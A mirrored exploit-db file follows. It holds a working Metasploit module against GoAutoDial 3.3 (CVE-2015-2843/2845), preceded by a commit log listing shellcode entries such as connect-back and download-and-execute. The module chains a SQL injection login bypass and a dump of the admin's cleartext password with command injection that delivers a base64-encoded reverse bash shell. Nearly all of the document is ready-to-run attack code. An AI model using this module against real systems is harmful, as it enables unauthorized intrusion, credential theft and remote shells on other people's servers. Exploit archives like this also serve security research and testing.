exploit-db-mirror/platforms/unix/remote/42296.rb
Offensive Security 9a0992d704 DB: 2017-07-06
3 new exploits

GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)
Lepide Auditor Suite - 'createdb()' Web Console Database Injection Remote Code Execution

(Generator) - /bin/sh Polymorphic Shellcode with printable ASCII characters
(Generator) - /bin/sh Polymorphic With Printable ASCII Characters Shellcode

(Generator) - Alphanumeric Shellcode Encoder/Decoder
(Generator) - Alphanumeric Shellcode (Encoder/Decoder)

Win32 - Multi-Format Shellcode Encoding Tool (Generator)
Win32 - Multi-Format Encoding Tool Shellcode (Generator)

Linux/x86 - Self-modifying Shellcode for IDS evasion (64 bytes)
Linux/x86 - Self-modifying for IDS evasion Shellcode (64 bytes)

Linux/x86 - Listens for Shellcode on 5555/TCP + Jumps to it (83 bytes)
Linux/x86 - Listens on 5555/TCP + Jumps to it Shellcode (83 bytes)

Linux/x86 - Shellcode Obfuscator
Linux/x86 - Shellcode Obfuscator (Generator)

Linux/x86 - Connectback Shellcode 127.0.0.1:31337/TCP (74 bytes)
Linux/x86 - Connectback 127.0.0.1:31337/TCP Shellcode (74 bytes)

OpenBSD/x86 - Add user _w00w00_ (112 Shellcode bytes)
OpenBSD/x86 - Add user _w00w00_ Shellcode (112 bytes)

Solaris/SPARC - connect-bac Shellcode k (204 bytes)
Solaris/SPARC - connect-back Shellcode (204 bytes)

Win32 - Download + Execute Shellcode (Generator) (Browsers Edition) (275+ bytes)
Win32 - Download + Execute Shellcode (Browsers Edition) (Generator)  (275+ bytes)

Windows 9x/NT/2000/XP - Reverse Generic Shellcode without Loader (249 bytes)
Windows 9x/NT/2000/XP - Reverse Generic without Loader Shellcode (249 bytes)

Windows XP/2000/2003 - Connect Back Shellcode for Overflow (275 bytes)
Windows XP/2000/2003 - Overflow Connect Back Shellcode (275 bytes)

Windows - Safari JS JITed Shellcode - exec calc (ASLR/DEP bypass)
Safari 4.0.5 - 5.0.0 (Windows XP /  7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Shellcode

ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic  Shellcode (Generator)
ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)

Win32 - Shellcode Checksum Routine (18 bytes)
Win32 - Checksum Routine Shellcode (18 bytes)

Linux/MIPS - XOR Shellcode Encoder (60 bytes)
Linux/MIPS - XOR Encoder Shellcode (Generator) (60 bytes)
Linux/x86 - custom execve-Shellcode Encoder/Decoder
Linux/x86 - Execve /bin/sh Shellcode Via Push (21 bytes)
Linux/x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes)
Linux/x86 - custom execve Shellcode (Encoder/Decoder) (Generator)
Linux/x86 - Execve /bin/sh Via Push Shellcode (21 bytes)
Linux/x86-64 - Execve /bin/sh Via Push Shellcode (23 bytes)

Windows XP < 10 - WinExec Null-Free Shellcode (Python) (Generator)
Windows XP < 10 - WinExec Null-Free Shellcode (Generator) (Python)

Linux/x86 - /bin/sh Shellcode + ASLR Bruteforce
Linux/x86 - /bin/sh + ASLR Bruteforce Shellcode

Linux/x86 - Bind Netcat Shellcode with Port (44/52 bytes)
Linux/x86 - Bind Netcat with Port Shellcode (44/52 bytes)

Linux/x86 - Reverse TCP Shellcode (67 bytes)
2017-07-06 05:01:24 +00:00


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
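# GoAutoDial 3.3 login SQL injection → command injection (CVE-2015-2843 /
# CVE-2015-2845).
#
# The module issues three HTTP requests against TARGETURI: a changelog fetch
# used as a version probe (check), a POST to the login validator carrying the
# injection, and — with the session cookie that returns — a GET to the user
# info endpoint and one to the cpanel endpoint carrying the encoded payload.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Build stamp that check() looks for in the target's changelog.txt; a
  # changelog containing it is reported as patched.
  PATCHED_BUILD_STAMP = '1421902800'.freeze

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'GoAutoDial 3.3 Authentication Bypass / Command Injection',
      'Description' => %q{
        This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. The default pre-packaged ISO builds are available from goautodial.org. Currently, the hardcoded command injection payload is an encoded reverse-tcp bash one-liner and the handler should be setup to receive it appropriately.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Chris McCurley' # Discovery & Metasploit module
        ],
      'References' =>
        [
          ['CVE', '2015-2843'],
          ['CVE', '2015-2845']
        ],
      'Platform' => %w[unix],
      'Arch' => ARCH_CMD,
      'Targets' => [['Automatic', {}]],
      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
      'DefaultTarget' => 0,
      # NOTE(review): the description states the injected command runs as root,
      # which does not agree with Privileged => false — confirm against a target.
      'Privileged' => false,
      'DisclosureDate' => 'Apr 21 2015'))

    register_options(
      [
        OptPort.new('RPORT', [true, 'The target port', 443]),
        OptBool.new('SSL', [false, 'Use SSL', true]),
        OptString.new('TARGETURI', [true, 'The base path', '/'])
      ])
  end

  # Version probe based on the target's changelog.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when the changelog request got
  #   no answer (the original reported Vulnerable in that case), Safe when the
  #   body carries PATCHED_BUILD_STAMP, Vulnerable otherwise.
  def check
    res = check_version
    return Exploit::CheckCode::Unknown unless res
    return Exploit::CheckCode::Safe if res.body.to_s.include?(PATCHED_BUILD_STAMP)

    # NOTE(review): any other answer, including a 404 for changelog.txt, is
    # still reported as Vulnerable, as in the original — verify that this does
    # not produce false positives on builds without a changelog.
    Exploit::CheckCode::Vulnerable
  end

  # Fetches changelog.txt under TARGETURI.
  #
  # @return [Rex::Proto::Http::Response, nil] nil when the host did not answer
  def check_version
    send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'changelog.txt'),
      'headers' => request_headers
    )
  end

  # Posts the login request carrying the SQL injection in the password field.
  #
  # @return [Rex::Proto::Http::Response, nil] the login response; its cookies
  #   are what the later requests authenticate with
  def sqli_auth_bypass
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'index.php', 'go_login', 'validate_credentials'),
      'headers' => request_headers,
      'vars_post' => {
        'user_name' => 'admin',
        'user_pass' => '\'%20or%20\'1\'%3D\'1'
      }
    )
  end

  # Requests the user-info endpoint with the bypass session.
  #
  # @param cookies [String] Cookie header value obtained from the login response
  # @return [Rex::Proto::Http::Response, nil] response whose body is printed
  #   verbatim by exploit()
  def sqli_admin_pass(cookies)
    send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'index.php', 'go_site', 'go_get_user_info', '\'%20OR%20active=\'Y'),
      'headers' => request_headers('Cookie' => cookies)
    )
  end

  #
  # Run the actual exploit
  #
  # Sends the base64-wrapped payload as a path segment of the cpanel endpoint,
  # using the session cookie stored in @cookie by exploit().
  #
  # @return [Rex::Proto::Http::Response, nil]
  def execute_command
    encoded = Rex::Text.encode_base64(payload.encoded)
    params = "||%20bash%20-c%20\"eval%20`echo%20-n%20#{encoded}%20|%20base64%20--decode`\""
    send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'index.php', 'go_site', 'cpanel', params),
      'headers' => request_headers('Cookie' => @cookie)
    )
  end

  # Runs the chain: login bypass, admin record dump, then command injection.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the login request gets no
  #   answer or is not accepted — the original only printed an error and then
  #   dereferenced the nil response.
  def exploit
    print_status("#{rhost}:#{rport} - Trying SQL injection...")
    res1 = sqli_auth_bypass
    fail_with(Failure::Unreachable, 'No response to the login request') unless res1
    unless res1.code == 200
      fail_with(Failure::NoAccess, 'Error: Run \'check\' command to identify whether the auth bypass has been fixed')
    end
    print_good('Authentication Bypass (SQLi) was successful')
    @cookie = res1.get_cookies

    print_status("#{rhost}:#{rport} - Dumping admin password...")
    res = sqli_admin_pass(@cookie)
    if res
      print_good(res.body)
    else
      print_error('Error: No creds returned, possible mitigations are in place.')
    end

    print_status("#{rhost}:#{rport} - Sending payload...waiting for connection")
    execute_command
  end

  private

  # Browser-like headers sent with every request. Returns a fresh Hash on each
  # call so per-request additions never leak into the next request.
  #
  # @param extra [Hash] headers merged over the defaults (e.g. 'Cookie')
  # @return [Hash]
  def request_headers(extra = {})
    {
      'User-Agent' => 'Mozilla/5.0',
      'Accept-Encoding' => 'identity'
    }.merge(extra)
  end
end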